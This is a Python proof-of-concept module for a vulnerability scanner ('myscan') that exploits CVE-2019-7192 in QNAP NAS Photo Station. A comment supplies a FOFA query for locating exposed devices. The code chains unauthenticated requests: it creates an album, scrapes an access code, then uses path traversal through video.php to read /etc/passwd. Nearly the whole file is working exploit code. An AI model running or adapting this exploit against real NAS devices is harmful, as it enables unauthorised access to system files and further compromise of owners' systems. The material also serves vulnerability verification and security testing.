# !/usr/bin/env python3
# @Time    : 2020/7/23
# @Author  : caicai
# @File    : poc_qnap-cve-2019-7192_2019.py

'''
fofa:
app="QNAP-NAS"
'''
from myscan.lib.parse.response_parser import response_parser  ##写了一些操作resonse的方法的类
from myscan.lib.helper.request import request, request_session  # 修改了requests.request请求的库，建议使用此库，会在redis计数
from myscan.config import scan_set
import re, requests


class POC():
    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # python的dict数据，详情请看docs/开发指南Example dict数据示例
        self.url = workdata.get("data")  # self.url为需要测试的url，值为目录url，会以/结尾,如https://www.baidu.com/home/ ,为目录
        self.result = []  # 此result保存dict数据，dict需包含name,url,level,detail字段，detail字段值必须为dict。如下self.result.append代码
        self.name = "qnap-cve-2019-7192"
        self.vulmsg = "see it:https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit"
        self.level = 2  # 0:Low  1:Medium 2:High

    def verify(self):
        # 根据config.py 配置的深度，限定一下目录深度
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return
        session = requests.session()
        req = {
            "method": "POST",
            "url": self.url + "photo/p/api/album.php",
            "headers": {
                "Content-Type": "application/x-www-form-urlencoded",
                "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169"
            },
            "data": "a=setSlideshow&f=qsamplealbum",
            "allow_redirects": False,
            "timeout": 10,
            "verify": False,
        }
        r = request_session(session, **req)
        if r != None and r.status_code == 200:
            res = re.search("<output>(?P<album_id>.*?)</output>", r.text)
            if res:
                id = res.group(("album_id"))
                req1 = {
                    "method": "GET",
                    "url": self.url + "photo/slideshow.php?album={}".format(id),
                    "allow_redirects": False,
                    "timeout": 10,
                    "verify": False,
                }
                r1 = request_session(session, **req1)
                if r1 != None and r1.status_code == 200:
                    res = re.search("encodeURIComponent\(\'(?P<access_code>.*?)\'\)", r1.text)
                    if res:
                        code = res.group("access_code")
                        req["url"] = self.url + "photo/p/api/video.php"
                        req["data"] = "album={}&a=caption&ac={}&f=UMGObv&filename=./../../../../../etc/passwd".format(
                            id, code)
                        r = request_session(session, **req)
                        if r is not None and r.status_code == 200 and b"admin:x:0:0" in r.content:
                            parser_ = response_parser(r)
                            self.result.append({
                                "name": self.name,
                                "url": parser_.geturl(),
                                "level": self.level,  # 0:Low  1:Medium 2:High
                                "detail": {
                                    "vulmsg": self.vulmsg,
                                    "request": parser_.getrequestraw(),
                                    "response": parser_.getresponseraw()
                                }
                            })
